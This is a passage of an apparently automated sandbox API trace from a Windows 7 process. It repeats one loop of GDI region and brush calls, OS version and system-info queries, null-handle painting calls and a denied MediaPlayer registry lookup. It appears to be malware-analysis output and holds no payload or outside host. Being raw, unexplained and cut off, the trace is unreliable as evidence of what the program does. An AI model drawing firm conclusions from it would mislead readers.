(color=0xff) returned 0x2100b2b [0017.615] CreateSolidBrush (color=0xff0000) returned 0x1100b2e [0017.615] DeleteObject (ho=0x1100b2e) returned 1 [0017.615] DeleteObject (ho=0x7204027d) returned 1 [0017.615] DeleteObject (ho=0x7c040713) returned 1 [0017.615] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.615] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.616] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.616] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.616] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.616] BeginPath (hdc=0x0) returned 0 [0017.616] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.616] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.616] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.616] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.616] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.616] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.616] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.616] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.616] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7304027d [0017.616] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d040713 [0017.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2f [0017.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b30 [0017.616] CombineRgn (hrgnDst=0x1040b2f, hrgnSrc1=0x7304027d, hrgnSrc2=0x7d040713, iMode=1) returned 1 [0017.616] CombineRgn (hrgnDst=0x1040b30, hrgnSrc1=0x7304027d, hrgnSrc2=0x7d040713, iMode=4) returned 2 [0017.616] CreateSolidBrush (color=0xff) returned 0x2100b2e [0017.616] CreateSolidBrush (color=0xff0000) returned 0x1100b31 [0017.616] DeleteObject (ho=0x1100b31) returned 1 [0017.616] DeleteObject (ho=0x7d040713) returned 1 [0017.616] DeleteObject (ho=0x7304027d) returned 1 [0017.616] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.616] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.616] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.616] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.616] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.616] BeginPath (hdc=0x0) returned 0 [0017.616] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.617] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.617] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.617] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.617] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.617] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e040713 [0017.617] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7404027d [0017.617] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b32 [0017.617] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b33 [0017.617] CombineRgn (hrgnDst=0x1040b32, hrgnSrc1=0x7e040713, hrgnSrc2=0x7404027d, iMode=1) returned 1 [0017.617] CombineRgn (hrgnDst=0x1040b33, hrgnSrc1=0x7e040713, hrgnSrc2=0x7404027d, iMode=4) returned 2 [0017.617] CreateSolidBrush (color=0xff) returned 0x2100b31 [0017.617] CreateSolidBrush (color=0xff0000) returned 0x1100b34 [0017.617] DeleteObject (ho=0x1100b34) returned 1 [0017.617] DeleteObject (ho=0x7404027d) returned 1 [0017.617] DeleteObject (ho=0x7e040713) returned 1 [0017.617] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.617] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.617] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.617] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.617] BeginPath (hdc=0x0) returned 0 [0017.617] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.617] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.617] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.617] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.618] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.618] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7504027d [0017.618] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f040713 [0017.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b35 [0017.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b36 [0017.618] CombineRgn (hrgnDst=0x1040b35, hrgnSrc1=0x7504027d, hrgnSrc2=0x7f040713, iMode=1) returned 1 [0017.618] CombineRgn (hrgnDst=0x1040b36, hrgnSrc1=0x7504027d, hrgnSrc2=0x7f040713, iMode=4) returned 2 [0017.618] CreateSolidBrush (color=0xff) returned 0x2100b34 [0017.618] CreateSolidBrush (color=0xff0000) returned 0x1100b37 [0017.618] DeleteObject (ho=0x1100b37) returned 1 [0017.618] DeleteObject (ho=0x7f040713) returned 1 [0017.618] DeleteObject (ho=0x7504027d) returned 1 [0017.618] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.618] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.618] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.618] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.618] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.618] BeginPath (hdc=0x0) returned 0 [0017.618] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.618] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.618] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.618] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.618] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.618] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.618] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.618] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.619] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80040713 [0017.619] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7604027d [0017.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b38 [0017.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b39 [0017.619] CombineRgn (hrgnDst=0x1040b38, hrgnSrc1=0x80040713, hrgnSrc2=0x7604027d, iMode=1) returned 1 [0017.619] CombineRgn (hrgnDst=0x1040b39, hrgnSrc1=0x80040713, hrgnSrc2=0x7604027d, iMode=4) returned 2 [0017.619] CreateSolidBrush (color=0xff) returned 0x2100b37 [0017.619] CreateSolidBrush (color=0xff0000) returned 0x1100b3a [0017.619] DeleteObject (ho=0x1100b3a) returned 1 [0017.619] DeleteObject (ho=0x7604027d) returned 1 [0017.619] DeleteObject (ho=0x80040713) returned 1 [0017.619] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.619] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.619] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.619] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.619] BeginPath (hdc=0x0) returned 0 [0017.619] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.619] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.619] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.619] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.619] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.619] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.619] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.619] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7704027d [0017.619] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x81040713 [0017.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3b [0017.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3c [0017.619] CombineRgn (hrgnDst=0x1040b3b, hrgnSrc1=0x7704027d, hrgnSrc2=0x81040713, iMode=1) returned 1 [0017.619] CombineRgn (hrgnDst=0x1040b3c, hrgnSrc1=0x7704027d, hrgnSrc2=0x81040713, iMode=4) returned 2 [0017.619] CreateSolidBrush (color=0xff) returned 0x2100b3a [0017.620] CreateSolidBrush (color=0xff0000) returned 0x1100b3d [0017.620] DeleteObject (ho=0x1100b3d) returned 1 [0017.620] DeleteObject (ho=0x81040713) returned 1 [0017.620] DeleteObject (ho=0x7704027d) returned 1 [0017.620] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.620] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.620] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.620] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.620] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.620] BeginPath (hdc=0x0) returned 0 [0017.620] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.620] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.620] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.620] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.620] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.620] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x82040713 [0017.620] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7804027d [0017.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3e [0017.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3f [0017.620] CombineRgn (hrgnDst=0x1040b3e, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=1) returned 1 [0017.620] CombineRgn (hrgnDst=0x1040b3f, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=4) returned 2 [0017.620] CreateSolidBrush (color=0xff) returned 0x2100b3d [0017.620] CreateSolidBrush (color=0xff0000) returned 0x1100b40 [0017.620] DeleteObject (ho=0x1100b40) returned 1 [0017.620] DeleteObject (ho=0x7804027d) returned 1 [0017.620] DeleteObject (ho=0x82040713) returned 1 [0017.620] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.620] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.621] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.621] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.621] BeginPath (hdc=0x0) returned 0 [0017.621] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.621] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.621] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.621] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.621] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7904027d [0017.621] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x83040713 [0017.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b41 [0017.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b42 [0017.621] CombineRgn (hrgnDst=0x1040b41, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=1) returned 1 [0017.621] CombineRgn (hrgnDst=0x1040b42, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=4) returned 2 [0017.621] CreateSolidBrush (color=0xff) returned 0x2100b40 [0017.621] CreateSolidBrush (color=0xff0000) returned 0x1100b43 [0017.621] DeleteObject (ho=0x1100b43) returned 1 [0017.621] DeleteObject (ho=0x83040713) returned 1 [0017.621] DeleteObject (ho=0x7904027d) returned 1 [0017.621] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.621] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.621] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.621] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.621] BeginPath (hdc=0x0) returned 0 [0017.621] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.622] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.622] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.622] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.622] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.622] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.622] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x84040713 [0017.622] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a04027d [0017.622] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b44 [0017.622] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b45 [0017.622] CombineRgn (hrgnDst=0x1040b44, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=1) returned 1 [0017.622] CombineRgn (hrgnDst=0x1040b45, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=4) returned 2 [0017.622] CreateSolidBrush (color=0xff) returned 0x2100b43 [0017.622] CreateSolidBrush (color=0xff0000) returned 0x1100b46 [0017.622] DeleteObject (ho=0x1100b46) returned 1 [0017.622] DeleteObject (ho=0x7a04027d) returned 1 [0017.622] DeleteObject (ho=0x84040713) returned 1 [0017.622] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.622] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.622] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.622] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.622] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.622] BeginPath (hdc=0x0) returned 0 [0017.622] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.622] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.622] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.622] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.622] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.623] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.623] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b04027d [0017.623] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x85040713 [0017.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b47 [0017.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b48 [0017.623] CombineRgn (hrgnDst=0x1040b47, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=1) returned 1 [0017.623] CombineRgn (hrgnDst=0x1040b48, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=4) returned 2 [0017.623] CreateSolidBrush (color=0xff) returned 0x2100b46 [0017.623] CreateSolidBrush (color=0xff0000) returned 0x1100b49 [0017.623] DeleteObject (ho=0x1100b49) returned 1 [0017.623] DeleteObject (ho=0x85040713) returned 1 [0017.623] DeleteObject (ho=0x7b04027d) returned 1 [0017.623] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.623] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.623] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 